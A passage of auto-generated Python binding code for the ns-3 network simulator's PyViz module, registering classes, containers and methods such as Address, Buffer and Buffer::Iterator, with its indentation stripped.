module.add_class('Node', import_from_module='ns.network', parent=root_module['ns3::Object'])
## object-factory.h (module 'core'): ns3::ObjectFactoryChecker [class]
module.add_class('ObjectFactoryChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## object-factory.h (module 'core'): ns3::ObjectFactoryValue [class]
module.add_class('ObjectFactoryValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## output-stream-wrapper.h (module 'network'): ns3::OutputStreamWrapper [class]
module.add_class('OutputStreamWrapper', import_from_module='ns.network', parent=root_module['ns3::SimpleRefCount< ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> >'])
## packet.h (module 'network'): ns3::Packet [class]
module.add_class('Packet', import_from_module='ns.network', parent=root_module['ns3::SimpleRefCount< ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >'])
## nstime.h (module 'core'): ns3::TimeChecker [class]
module.add_class('TimeChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## nstime.h (module 'core'): ns3::TimeValue [class]
module.add_class('TimeValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## type-id.h (module 'core'): ns3::TypeIdChecker [class]
module.add_class('TypeIdChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## type-id.h (module 'core'): ns3::TypeIdValue [class]
module.add_class('TypeIdValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## address.h (module 'network'): ns3::AddressChecker [class]
module.add_class('AddressChecker', import_from_module='ns.network', parent=root_module['ns3::AttributeChecker'])
## address.h (module 'network'): ns3::AddressValue [class]
module.add_class('AddressValue', import_from_module='ns.network', parent=root_module['ns3::AttributeValue'])
module.add_container('std::vector< ns3::PyViz::RxPacketSample >', 'ns3::PyViz::RxPacketSample', container_type='vector')
module.add_container('std::vector< ns3::PyViz::TxPacketSample >', 'ns3::PyViz::TxPacketSample', container_type='vector')
module.add_container('std::vector< ns3::PyViz::PacketSample >', 'ns3::PyViz::PacketSample', container_type='vector')
module.add_container('std::set< ns3::TypeId >', 'ns3::TypeId', container_type='set')
module.add_container('std::vector< ns3::PyViz::TransmissionSample >', 'ns3::PyViz::TransmissionSample', container_type='vector')
module.add_container('std::vector< ns3::PyViz::PacketDropSample >', 'ns3::PyViz::PacketDropSample', container_type='vector')
module.add_container('std::vector< ns3::PyViz::NetDeviceStatistics >', 'ns3::PyViz::NetDeviceStatistics', container_type='vector')
module.add_container('std::vector< std::string >', 'std::string', container_type='vector')
module.add_container('std::set< unsigned int >', 'unsigned int', container_type='set')
module.add_container('std::vector< ns3::PyViz::NodeStatistics >', 'ns3::PyViz::NodeStatistics', container_type='vector')
module.add_container('std::map< unsigned int, unsigned int >', ('unsigned int', 'unsigned int'), container_type='map')
## Register a nested module for the namespace FatalImpl
nested_module = module.add_cpp_namespace('FatalImpl')
register_types_ns3_FatalImpl(nested_module)
def register_types_ns3_FatalImpl(module):
root_module = module.get_root()
def register_methods(root_module):
register_Ns3Address_methods(root_module, root_module['ns3::Address'])
register_Ns3AttributeConstructionList_methods(root_module, root_module['ns3::AttributeConstructionList'])
register_Ns3AttributeConstructionListItem_methods(root_module, root_module['ns3::AttributeConstructionList::Item'])
register_Ns3Buffer_methods(root_module, root_module['ns3::Buffer'])
register_Ns3BufferIterator_methods(root_module, root_module['ns3::Buffer::Iterator'])
register_Ns3ByteTagIterator_methods(root_module, root_module['ns3::ByteTagIterator'])
register_Ns3ByteTagIteratorItem_methods(root_module, root_module['ns3::ByteTagIterator::Item'])
register_Ns3ByteTagList_methods(root_module, root_module['ns3::ByteTagList'])
register_Ns3ByteTagListIterator_methods(root_module, root_module['ns3::ByteTagList::Iterator'])
register_Ns3ByteTagListIteratorItem_methods(root_module, root_module['ns3::ByteTagList::Iterator::Item'])
register_Ns3CallbackBase_methods(root_module, root_module['ns3::CallbackBase'])
register_Ns3EventId_methods(root_module, root_module['ns3::EventId'])
register_Ns3Ipv4Address_methods(root_module, root_module['ns3::Ipv4Address'])
register_Ns3Ipv4InterfaceAddress_methods(root_module, root_module['ns3::Ipv4InterfaceAddress'])
register_Ns3Ipv4Mask_methods(root_module, root_module['ns3::Ipv4Mask'])
register_Ns3Ipv6Address_methods(root_module, root_module['ns3::Ipv6Address'])
register_Ns3Ipv6Prefix_methods(root_module, root_module['ns3::Ipv6Prefix'])
register_Ns3Mac48Address_methods(root_module, root_module['ns3::Mac48Address'])
register_Ns3ObjectBase_methods(root_module, root_module['ns3::ObjectBase'])
register_Ns3ObjectDeleter_methods(root_module, root_module['ns3::ObjectDeleter'])
register_Ns3ObjectFactory_methods(root_module, root_module['ns3::ObjectFactory'])
register_Ns3PacketMetadata_methods(root_module, root_module['ns3::PacketMetadata'])
register_Ns3PacketMetadataItem_methods(root_module, root_module['ns3::PacketMetadata::Item'])
register_Ns3PacketMetadataItemIterator_methods(root_module, root_module['ns3::PacketMetadata::ItemIterator'])
register_Ns3PacketTagIterator_methods(root_module, root_module['ns3::PacketTagIterator'])
register_Ns3PacketTagIteratorItem_methods(root_module, root_module['ns3::PacketTagIterator::Item'])
register_Ns3PacketTagList_methods(root_module, root_module['ns3::PacketTagList'])
register_Ns3PacketTagListTagData_methods(root_module, root_module['ns3::PacketTagList::TagData'])
register_Ns3PyViz_methods(root_module, root_module['ns3::PyViz'])
register_Ns3PyVizLastPacketsSample_methods(root_module, root_module['ns3::PyViz::LastPacketsSample'])
register_Ns3PyVizNetDeviceStatistics_methods(root_module, root_module['ns3::PyViz::NetDeviceStatistics'])
register_Ns3PyVizNodeStatistics_methods(root_module, root_module['ns3::PyViz::NodeStatistics'])
register_Ns3PyVizPacketCaptureOptions_methods(root_module, root_module['ns3::PyViz::PacketCaptureOptions'])
register_Ns3PyVizPacketDropSample_methods(root_module, root_module['ns3::PyViz::PacketDropSample'])
register_Ns3PyVizPacketSample_methods(root_module, root_module['ns3::PyViz::PacketSample'])
register_Ns3PyVizRxPacketSample_methods(root_module, root_module['ns3::PyViz::RxPacketSample'])
register_Ns3PyVizTransmissionSample_methods(root_module, root_module['ns3::PyViz::TransmissionSample'])
register_Ns3PyVizTxPacketSample_methods(root_module, root_module['ns3::PyViz::TxPacketSample'])
register_Ns3SimpleRefCount__Ns3Object_Ns3ObjectBase_Ns3ObjectDeleter_methods(root_module, root_module['ns3::SimpleRefCount< ns3::Object, ns3::ObjectBase, ns3::ObjectDeleter >'])
register_Ns3Simulator_methods(root_module, root_module['ns3::Simulator'])
register_Ns3Tag_methods(root_module, root_module['ns3::Tag'])
register_Ns3TagBuffer_methods(root_module, root_module['ns3::TagBuffer'])
register_Ns3TypeId_methods(root_module, root_module['ns3::TypeId'])
register_Ns3TypeIdAttributeInformation_methods(root_module, root_module['ns3::TypeId::AttributeInformation'])
register_Ns3TypeIdTraceSourceInformation_methods(root_module, root_module['ns3::TypeId::TraceSourceInformation'])
register_Ns3Empty_methods(root_module, root_module['ns3::empty'])
register_Ns3Int64x64_t_methods(root_module, root_module['ns3::int64x64_t'])
register_Ns3Chunk_methods(root_module, root_module['ns3::Chunk'])
register_Ns3Header_methods(root_module, root_module['ns3::Header'])
register_Ns3Ipv4Header_methods(root_module, root_module['ns3::Ipv4Header'])
register_Ns3Object_methods(root_module, root_module['ns3::Object'])
register_Ns3ObjectAggregateIterator_methods(root_module, root_module['ns3::Object::AggregateIterator'])
register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >'])
register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >'])
register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >'])
register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >'])
register_Ns3SimpleRefCount__Ns3EventImpl_Ns3Empty_Ns3DefaultDeleter__lt__ns3EventImpl__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::EventImpl, ns3::empty, ns3::DefaultDeleter<ns3::EventImpl> >'])
register_Ns3SimpleRefCount__Ns3Ipv4MulticastRoute_Ns3Empty_Ns3DefaultDeleter__lt__ns3Ipv4MulticastRoute__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4MulticastRoute> >'])
register_Ns3SimpleRefCount__Ns3Ipv4Route_Ns3Empty_Ns3DefaultDeleter__lt__ns3Ipv4Route__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter<ns3::Ipv4Route> >'])
register_Ns3SimpleRefCount__Ns3NixVector_Ns3Empty_Ns3DefaultDeleter__lt__ns3NixVector__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::NixVector, ns3::empty, ns3::DefaultDeleter<ns3::NixVector> >'])
register_Ns3SimpleRefCount__Ns3OutputStreamWrapper_Ns3Empty_Ns3DefaultDeleter__lt__ns3OutputStreamWrapper__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter<ns3::OutputStreamWrapper> >'])
register_Ns3SimpleRefCount__Ns3Packet_Ns3Empty_Ns3DefaultDeleter__lt__ns3Packet__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::Packet, ns3::empty, ns3::DefaultDeleter<ns3::Packet> >'])
register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >'])
register_Ns3Socket_methods(root_module, root_module['ns3::Socket'])
register_Ns3SocketAddressTag_methods(root_module, root_module['ns3::SocketAddressTag'])
register_Ns3SocketIpTtlTag_methods(root_module, root_module['ns3::SocketIpTtlTag'])
register_Ns3SocketSetDontFragmentTag_methods(root_module, root_module['ns3::SocketSetDontFragmentTag'])
register_Ns3Time_methods(root_module, root_module['ns3::Time'])
register_Ns3TraceSourceAccessor_methods(root_module, root_module['ns3::TraceSourceAccessor'])
register_Ns3Trailer_methods(root_module, root_module['ns3::Trailer'])
register_Ns3AttributeAccessor_methods(root_module, root_module['ns3::AttributeAccessor'])
register_Ns3AttributeChecker_methods(root_module, root_module['ns3::AttributeChecker'])
register_Ns3AttributeValue_methods(root_module, root_module['ns3::AttributeValue'])
register_Ns3CallbackChecker_methods(root_module, root_module['ns3::CallbackChecker'])
register_Ns3CallbackImplBase_methods(root_module, root_module['ns3::CallbackImplBase'])
register_Ns3CallbackValue_methods(root_module, root_module['ns3::CallbackValue'])
register_Ns3Channel_methods(root_module, root_module['ns3::Channel'])
register_Ns3EmptyAttributeValue_methods(root_module, root_module['ns3::EmptyAttributeValue'])
register_Ns3EventImpl_methods(root_module, root_module['ns3::EventImpl'])
register_Ns3Ipv4_methods(root_module, root_module['ns3::Ipv4'])
register_Ns3Ipv4AddressChecker_methods(root_module, root_module['ns3::Ipv4AddressChecker'])
register_Ns3Ipv4AddressValue_methods(root_module, root_module['ns3::Ipv4AddressValue'])
register_Ns3Ipv4L3Protocol_methods(root_module, root_module['ns3::Ipv4L3Protocol'])
register_Ns3Ipv4L4Protocol_methods(root_module, root_module['ns3::Ipv4L4Protocol'])
register_Ns3Ipv4MaskChecker_methods(root_module, root_module['ns3::Ipv4MaskChecker'])
register_Ns3Ipv4MaskValue_methods(root_module, root_module['ns3::Ipv4MaskValue'])
register_Ns3Ipv4MulticastRoute_methods(root_module, root_module['ns3::Ipv4MulticastRoute'])
register_Ns3Ipv4Route_methods(root_module, root_module['ns3::Ipv4Route'])
register_Ns3Ipv4RoutingProtocol_methods(root_module, root_module['ns3::Ipv4RoutingProtocol'])
register_Ns3Ipv6AddressChecker_methods(root_module, root_module['ns3::Ipv6AddressChecker'])
register_Ns3Ipv6AddressValue_methods(root_module, root_module['ns3::Ipv6AddressValue'])
register_Ns3Ipv6PrefixChecker_methods(root_module, root_module['ns3::Ipv6PrefixChecker'])
register_Ns3Ipv6PrefixValue_methods(root_module, root_module['ns3::Ipv6PrefixValue'])
register_Ns3Mac48AddressChecker_methods(root_module, root_module['ns3::Mac48AddressChecker'])
register_Ns3Mac48AddressValue_methods(root_module, root_module['ns3::Mac48AddressValue'])
register_Ns3NetDevice_methods(root_module, root_module['ns3::NetDevice'])
register_Ns3NixVector_methods(root_module, root_module['ns3::NixVector'])
register_Ns3Node_methods(root_module, root_module['ns3::Node'])
register_Ns3ObjectFactoryChecker_methods(root_module, root_module['ns3::ObjectFactoryChecker'])
register_Ns3ObjectFactoryValue_methods(root_module, root_module['ns3::ObjectFactoryValue'])
register_Ns3OutputStreamWrapper_methods(root_module, root_module['ns3::OutputStreamWrapper'])
register_Ns3Packet_methods(root_module, root_module['ns3::Packet'])
register_Ns3TimeChecker_methods(root_module, root_module['ns3::TimeChecker'])
register_Ns3TimeValue_methods(root_module, root_module['ns3::TimeValue'])
register_Ns3TypeIdChecker_methods(root_module, root_module['ns3::TypeIdChecker'])
register_Ns3TypeIdValue_methods(root_module, root_module['ns3::TypeIdValue'])
register_Ns3AddressChecker_methods(root_module, root_module['ns3::AddressChecker'])
register_Ns3AddressValue_methods(root_module, root_module['ns3::AddressValue'])
return
def register_Ns3Address_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## address.h (module 'network'): ns3::Address::Address() [constructor]
cls.add_constructor([])
## address.h (module 'network'): ns3::Address::Address(uint8_t type, uint8_t const * buffer, uint8_t len) [constructor]
cls.add_constructor([param('uint8_t', 'type'), param('uint8_t const *', 'buffer'), param('uint8_t', 'len')])
## address.h (module 'network'): ns3::Address::Address(ns3::Address const & address) [copy constructor]
cls.add_constructor([param('ns3::Address const &', 'address')])
## address.h (module 'network'): bool ns3::Address::CheckCompatible(uint8_t type, uint8_t len) const [member function]
cls.add_method('CheckCompatible',
'bool',
[param('uint8_t', 'type'), param('uint8_t', 'len')],
is_const=True)
## address.h (module 'network'): uint32_t ns3::Address::CopyAllFrom(uint8_t const * buffer, uint8_t len) [member function]
cls.add_method('CopyAllFrom',
'uint32_t',
[param('uint8_t const *', 'buffer'), param('uint8_t', 'len')])
## address.h (module 'network'): uint32_t ns3::Address::CopyAllTo(uint8_t * buffer, uint8_t len) const [member function]
cls.add_method('CopyAllTo',
'uint32_t',
[param('uint8_t *', 'buffer'), param('uint8_t', 'len')],
is_const=True)
## address.h (module 'network'): uint32_t ns3::Address::CopyFrom(uint8_t const * buffer, uint8_t len) [member function]
cls.add_method('CopyFrom',
'uint32_t',
[param('uint8_t const *', 'buffer'), param('uint8_t', 'len')])
## address.h (module 'network'): uint32_t ns3::Address::CopyTo(uint8_t * buffer) const [member function]
cls.add_method('CopyTo',
'uint32_t',
[param('uint8_t *', 'buffer')],
is_const=True)
## address.h (module 'network'): void ns3::Address::Deserialize(ns3::TagBuffer buffer) [member function]
cls.add_method('Deserialize',
'void',
[param('ns3::TagBuffer', 'buffer')])
## address.h (module 'network'): uint8_t ns3::Address::GetLength() const [member function]
cls.add_method('GetLength',
'uint8_t',
[],
is_const=True)
## address.h (module 'network'): uint32_t ns3::Address::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## address.h (module 'network'): bool ns3::Address::IsInvalid() const [member function]
cls.add_method('IsInvalid',
'bool',
[],
is_const=True)
## address.h (module 'network'): bool ns3::Address::IsMatchingType(uint8_t type) const [member function]
cls.add_method('IsMatchingType',
'bool',
[param('uint8_t', 'type')],
is_const=True)
## address.h (module 'network'): static uint8_t ns3::Address::Register() [member function]
cls.add_method('Register',
'uint8_t',
[],
is_static=True)
## address.h (module 'network'): void ns3::Address::Serialize(ns3::TagBuffer buffer) const [member function]
cls.add_method('Serialize',
'void',
[param('ns3::TagBuffer', 'buffer')],
is_const=True)
return
def register_Ns3AttributeConstructionList_methods(root_module, cls):
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::AttributeConstructionList(ns3::AttributeConstructionList const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeConstructionList const &', 'arg0')])
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::AttributeConstructionList() [constructor]
cls.add_constructor([])
## attribute-construction-list.h (module 'core'): void ns3::AttributeConstructionList::Add(std::string name, ns3::Ptr<ns3::AttributeChecker const> checker, ns3::Ptr<ns3::AttributeValue> value) [member function]
cls.add_method('Add',
'void',
[param('std::string', 'name'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker'), param('ns3::Ptr< ns3::AttributeValue >', 'value')])
## attribute-construction-list.h (module 'core'): std::_List_const_iterator<ns3::AttributeConstructionList::Item> ns3::AttributeConstructionList::Begin() const [member function]
cls.add_method('Begin',
'std::_List_const_iterator< ns3::AttributeConstructionList::Item >',
[],
is_const=True)
## attribute-construction-list.h (module 'core'): std::_List_const_iterator<ns3::AttributeConstructionList::Item> ns3::AttributeConstructionList::End() const [member function]
cls.add_method('End',
'std::_List_const_iterator< ns3::AttributeConstructionList::Item >',
[],
is_const=True)
## attribute-construction-list.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::AttributeConstructionList::Find(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('Find',
'ns3::Ptr< ns3::AttributeValue >',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True)
return
def register_Ns3AttributeConstructionListItem_methods(root_module, cls):
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::Item() [constructor]
cls.add_constructor([])
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::Item(ns3::AttributeConstructionList::Item const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AttributeConstructionList::Item const &', 'arg0')])
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::checker [variable]
cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False)
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
## attribute-construction-list.h (module 'core'): ns3::AttributeConstructionList::Item::value [variable]
cls.add_instance_attribute('value', 'ns3::Ptr< ns3::AttributeValue >', is_const=False)
return
def register_Ns3Buffer_methods(root_module, cls):
## buffer.h (module 'network'): ns3::Buffer::Buffer() [constructor]
cls.add_constructor([])
## buffer.h (module 'network'): ns3::Buffer::Buffer(uint32_t dataSize) [constructor]
cls.add_constructor([param('uint32_t', 'dataSize')])
## buffer.h (module 'network'): ns3::Buffer::Buffer(uint32_t dataSize, bool initialize) [constructor]
cls.add_constructor([param('uint32_t', 'dataSize'), param('bool', 'initialize')])
## buffer.h (module 'network'): ns3::Buffer::Buffer(ns3::Buffer const & o) [copy constructor]
cls.add_constructor([param('ns3::Buffer const &', 'o')])
## buffer.h (module 'network'): bool ns3::Buffer::AddAtEnd(uint32_t end) [member function]
cls.add_method('AddAtEnd',
'bool',
[param('uint32_t', 'end')])
## buffer.h (module 'network'): void ns3::Buffer::AddAtEnd(ns3::Buffer const & o) [member function]
cls.add_method('AddAtEnd',
'void',
[param('ns3::Buffer const &', 'o')])
## buffer.h (module 'network'): bool ns3::Buffer::AddAtStart(uint32_t start) [member function]
cls.add_method('AddAtStart',
'bool',
[param('uint32_t', 'start')])
## buffer.h (module 'network'): ns3::Buffer::Iterator ns3::Buffer::Begin() const [member function]
cls.add_method('Begin',
'ns3::Buffer::Iterator',
[],
is_const=True)
## buffer.h (module 'network'): void ns3::Buffer::CopyData(std::ostream * os, uint32_t size) const [member function]
cls.add_method('CopyData',
'void',
[param('std::ostream *', 'os'), param('uint32_t', 'size')],
is_const=True)
## buffer.h (module 'network'): uint32_t ns3::Buffer::CopyData(uint8_t * buffer, uint32_t size) const [member function]
cls.add_method('CopyData',
'uint32_t',
[param('uint8_t *', 'buffer'), param('uint32_t', 'size')],
is_const=True)
## buffer.h (module 'network'): ns3::Buffer ns3::Buffer::CreateFragment(uint32_t start, uint32_t length) const [member function]
cls.add_method('CreateFragment',
'ns3::Buffer',
[param('uint32_t', 'start'), param('uint32_t', 'length')],
is_const=True)
## buffer.h (module 'network'): ns3::Buffer ns3::Buffer::CreateFullCopy() const [member function]
cls.add_method('CreateFullCopy',
'ns3::Buffer',
[],
is_const=True)
## buffer.h (module 'network'): uint32_t ns3::Buffer::Deserialize(uint8_t const * buffer, uint32_t size) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
## buffer.h (module 'network'): ns3::Buffer::Iterator ns3::Buffer::End() const [member function]
cls.add_method('End',
'ns3::Buffer::Iterator',
[],
is_const=True)
## buffer.h (module 'network'): int32_t ns3::Buffer::GetCurrentEndOffset() const [member function]
cls.add_method('GetCurrentEndOffset',
'int32_t',
[],
is_const=True)
## buffer.h (module 'network'): int32_t ns3::Buffer::GetCurrentStartOffset() const [member function]
cls.add_method('GetCurrentStartOffset',
'int32_t',
[],
is_const=True)
## buffer.h (module 'network'): uint32_t ns3::Buffer::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## buffer.h (module 'network'): uint32_t ns3::Buffer::GetSize() const [member function]
cls.add_method('GetSize',
'uint32_t',
[],
is_const=True)
## buffer.h (module 'network'): uint8_t const * ns3::Buffer::PeekData() const [member function]
cls.add_method('PeekData',
'uint8_t const *',
[],
is_const=True)
## buffer.h (module 'network'): void ns3::Buffer::RemoveAtEnd(uint32_t end) [member function]
cls.add_method('RemoveAtEnd',
'void',
[param('uint32_t', 'end')])
## buffer.h (module 'network'): void ns3::Buffer::RemoveAtStart(uint32_t start) [member function]
cls.add_method('RemoveAtStart',
'void',
[param('uint32_t', 'start')])
## buffer.h (module 'network'): uint32_t ns3::Buffer::Serialize(uint8_t * buffer, uint32_t maxSize) const [member function]
cls.add_method('Serialize',
'uint32_t',
[param('uint8_t *', 'buffer'), param('uint32_t', 'maxSize')],
is_const=True)
return
def register_Ns3BufferIterator_methods(root_module, cls):
## buffer.h (module 'network'): ns3::Buffer::Iterator::Iterator(ns3::Buffer::Iterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Buffer::Iterator const &', 'arg0')])
## buffer.h (module 'network'): ns3::Buffer::Iterator::Iterator() [constructor]
cls.add_constructor([])
## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::CalculateIpChecksum(uint16_t size) [member function]
cls.add_method('CalculateIpChecksum',
'uint16_t',
[param('uint16_t', 'size')])
## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::CalculateIpChecksum(uint16_t size, uint32_t initialChecksum) [member function]
cls.add_method('CalculateIpChecksum',
'uint16_t',
[param('uint16_t', 'size'), param('uint32_t', 'initialChecksum')])
## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::GetDistanceFrom(ns3::Buffer::Iterator const & o) const [member function]
cls.add_method('GetDistanceFrom',
'uint32_t',
[param('ns3::Buffer::Iterator const &', 'o')],
is_const=True)
## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::GetSize() const [member function]
cls.add_method('GetSize',
'uint32_t',
[],
is_const=True)
## buffer.h (module 'network'): bool ns3::Buffer::Iterator::IsEnd() const [member function]
cls.add_method('IsEnd',
'bool',
[],
is_const=True)
## buffer.h (module 'network'): bool ns3::Buffer::Iterator::IsStart() const [member function]
cls.add_method('IsStart',
'bool',
[],
is_const=True)
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Next() [member function]
cls.add_method('Next',
'void',
[])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Next(uint32_t delta) [member function]
cls.add_method('Next',
'void',
[param('uint32_t', 'delta')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Prev() [member function]
cls.add_method('Prev',
'void',
[])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Prev(uint32_t delta) [member function]
cls.add_method('Prev',
'void',
[param('uint32_t', 'delta')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Read(uint8_t * buffer, uint32_t size) [member function]
cls.add_method('Read',
'void',
[param('uint8_t *', 'buffer'), param('uint32_t', 'size')])
## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::ReadLsbtohU16() [member function]
cls.add_method('ReadLsbtohU16',
'uint16_t',
[])
## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::ReadLsbtohU32() [member function]
cls.add_method('ReadLsbtohU32',
'uint32_t',
[])
## buffer.h (module 'network'): uint64_t ns3::Buffer::Iterator::ReadLsbtohU64() [member function]
cls.add_method('ReadLsbtohU64',
'uint64_t',
[])
## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::ReadNtohU16() [member function]
cls.add_method('ReadNtohU16',
'uint16_t',
[])
## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::ReadNtohU32() [member function]
cls.add_method('ReadNtohU32',
'uint32_t',
[])
## buffer.h (module 'network'): uint64_t ns3::Buffer::Iterator::ReadNtohU64() [member function]
cls.add_method('ReadNtohU64',
'uint64_t',
[])
## buffer.h (module 'network'): uint16_t ns3::Buffer::Iterator::ReadU16() [member function]
cls.add_method('ReadU16',
'uint16_t',
[])
## buffer.h (module 'network'): uint32_t ns3::Buffer::Iterator::ReadU32() [member function]
cls.add_method('ReadU32',
'uint32_t',
[])
## buffer.h (module 'network'): uint64_t ns3::Buffer::Iterator::ReadU64() [member function]
cls.add_method('ReadU64',
'uint64_t',
[])
## buffer.h (module 'network'): uint8_t ns3::Buffer::Iterator::ReadU8() [member function]
cls.add_method('ReadU8',
'uint8_t',
[])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Write(uint8_t const * buffer, uint32_t size) [member function]
cls.add_method('Write',
'void',
[param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::Write(ns3::Buffer::Iterator start, ns3::Buffer::Iterator end) [member function]
cls.add_method('Write',
'void',
[param('ns3::Buffer::Iterator', 'start'), param('ns3::Buffer::Iterator', 'end')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtolsbU16(uint16_t data) [member function]
cls.add_method('WriteHtolsbU16',
'void',
[param('uint16_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtolsbU32(uint32_t data) [member function]
cls.add_method('WriteHtolsbU32',
'void',
[param('uint32_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtolsbU64(uint64_t data) [member function]
cls.add_method('WriteHtolsbU64',
'void',
[param('uint64_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtonU16(uint16_t data) [member function]
cls.add_method('WriteHtonU16',
'void',
[param('uint16_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtonU32(uint32_t data) [member function]
cls.add_method('WriteHtonU32',
'void',
[param('uint32_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteHtonU64(uint64_t data) [member function]
cls.add_method('WriteHtonU64',
'void',
[param('uint64_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU16(uint16_t data) [member function]
cls.add_method('WriteU16',
'void',
[param('uint16_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU32(uint32_t data) [member function]
cls.add_method('WriteU32',
'void',
[param('uint32_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU64(uint64_t data) [member function]
cls.add_method('WriteU64',
'void',
[param('uint64_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU8(uint8_t data) [member function]
cls.add_method('WriteU8',
'void',
[param('uint8_t', 'data')])
## buffer.h (module 'network'): void ns3::Buffer::Iterator::WriteU8(uint8_t data, uint32_t len) [member function]
cls.add_method('WriteU8',
'void',
[param('uint8_t', 'data'), param('uint32_t', 'len')])
return
def register_Ns3ByteTagIterator_methods(root_module, cls):
## packet.h (module 'network'): ns3::ByteTagIterator::ByteTagIterator(ns3::ByteTagIterator const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ByteTagIterator const &', 'arg0')])
## packet.h (module 'network'): bool ns3::ByteTagIterator::HasNext() const [member function]
cls.add_method('HasNext',
'bool',
[],
is_const=True)
## packet.h (module 'network'): ns3::ByteTagIterator::Item ns3::ByteTagIterator::Next() [member function]
cls.add_method('Next',
'ns3::ByteTagIterator::Item',
[])
return
def register_Ns3ByteTagIteratorItem_methods(root_module, cls):
## packet.h (module 'network'): ns3::ByteTagIterator::Item::Item(ns3::ByteTagIterator::Item const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ByteTagIterator::Item const &', 'arg0')])
## packet.h (module 'network'): uint32_t ns3::ByteTagIterator::Item::GetEnd() const [member function]
cls.add_method('GetEnd',
'uint32_t',
[],
is_const=True)
